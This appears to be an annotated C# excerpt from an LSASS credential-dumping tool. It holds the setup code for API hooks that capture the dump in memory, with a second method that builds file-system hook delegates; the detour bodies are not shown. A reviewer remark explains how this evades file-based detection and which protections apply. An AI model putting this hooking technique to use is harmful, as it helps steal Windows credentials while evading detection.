/// <summary>
/// Sets up the in-process API hooks used by <c>MiniDumpToMem</c>: registers a
/// per-context dump buffer, records the target process identity, builds the
/// detour delegates, installs the four hooks and finally enables them.
/// </summary>
/// <param name="contextHandle">Key under which a fresh <c>DumpContext</c> is stored in <c>dumpContexts</c>.</param>
/// <param name="dumpSizeLimit">Forwarded to the <c>DumpContext</c> constructor; presumably an upper bound on buffered dump bytes (constructor not visible here — confirm).</param>
/// <param name="lsassPid">Copied to <c>MiniDumpToMem.lsassPid</c>.</param>
/// <param name="lsassHandle">Copied to <c>MiniDumpToMem.lsassHandle</c>.</param>
/// <remarks>
/// Reviewer note: the detour bodies are outside this listing, but hooking
/// NtOpenProcess together with the SetFilePointer/GetFileSize/WriteFile path
/// while holding an LSASS handle is consistent with capturing a process dump
/// in memory instead of in a file. Monitoring that keys only on dump-file
/// creation would not observe that; process-access telemetry on LSASS and
/// LSASS protection (RunAsPPL, Credential Guard) are the controls that apply.
/// </remarks>
internal static void InitHookEngine(IntPtr contextHandle, uint dumpSizeLimit, int lsassPid, IntPtr lsassHandle)
{
    const string NtDllModule = "ntdll.dll";
    const string KernelBaseModule = "kernelbase.dll";

    // A new engine replaces whatever hookEngine referenced before; nothing in
    // this method tears down a previous instance.
    hookEngine = new HookEngine();

    // Per-context state, keyed by the caller-supplied handle.
    dumpContexts[contextHandle] = new DumpContext(dumpSizeLimit);

    // Target process identity, kept in static fields (presumably read by the detours).
    MiniDumpToMem.lsassPid = lsassPid;
    MiniDumpToMem.lsassHandle = lsassHandle;

    // The detour delegates are held in fields rather than locals; presumably so the
    // GC cannot collect them while native code still holds their thunks (confirm).
    SetFilePointer_detour = new SetFilePointerDelegate(SetFilePointer);
    GetFileSize_detour = new GetFileSizeDelegate(GetFileSize);
    WriteFile_detour = new WriteFileDelegate(WriteFile);
    NtOpenProcess_detour = new NtOpenProcessDelegate(NtOpenProcess);

    // Install the hooks; each CreateHook result is kept in the matching *_orig field.
    NtOpenProcess_orig = hookEngine.CreateHook(NtDllModule, "NtOpenProcess", NtOpenProcess_detour);
    SetFilePointer_orig = hookEngine.CreateHook(KernelBaseModule, "SetFilePointer", SetFilePointer_detour);
    GetFileSize_orig = hookEngine.CreateHook(KernelBaseModule, "GetFileSize", GetFileSize_detour);
    WriteFile_orig = hookEngine.CreateHook(KernelBaseModule, "WriteFile", WriteFile_detour);

    // EnableHooks is called only after all four hooks have been created.
    hookEngine.EnableHooks();
}
/// <summary>
/// Creates one delegate per hook handler method and stores each in its
/// instance field. No hook is installed here; this method only builds the
/// delegate objects.
/// </summary>
/// <remarks>
/// The delegates are kept in fields rather than locals; presumably so they stay
/// reachable while unmanaged code holds function pointers to them (the
/// installation site is not visible in this listing — confirm).
/// </remarks>
private void InitializeDelegates()
{
    // File and directory creation, deletion and rename.
    _createFileDelegate = new CreateFileADelegate(CreateFileHook);
    _createDirectoryDelegate = new CreateDirectoryDelegate(CreateDirectoryHook);
    _deleteFileDelegate = new DeleteFileDelegate(DeleteFileHook);
    _removeDirectoryDelegate = new RemoveDirectoryDelegate(RemoveDirectoryHook);
    _moveFileDelegate = new MoveFileDelegate(MoveFileHook);

    // Operations on an already-open handle.
    _readFileDelegate = new ReadFileDelegate(ReadFileHook);
    _closeHandleDelegate = new CloseHandleDelegate(CloseHandleHook);

    // Attribute, type and metadata queries, plus positioning and truncation.
    _getFileAttributesDelegate = new GetFileAttributesDelegate(GetFileAttributesHook);
    _getFileTypeDelegate = new GetFileTypeDelegate(GetFileTypeHook);
    _setFilePointerDelegate = new SetFilePointerDelegate(SetFilePointerHook);
    _getFileInformationByHandleDelegate = new GetFileInformationByHandleDelegate(GetFileInformationByHandleHook);
    _setEndOfFileDelegate = new SetEndOfFileDelegate(SetEndOfFileHook);

    // Directory enumeration.
    _findFirstFile = new FindFirstFile(FindFirstFileHook);
    _findNextFile = new FindNextFile(FindNextFileHook);
    _findClose = new FindClose(FindCloseHook);

    // Project-specific handler; its purpose is not visible in this listing.
    _tioPathAdd = new TioPathAdd(TioPathAddHook);
}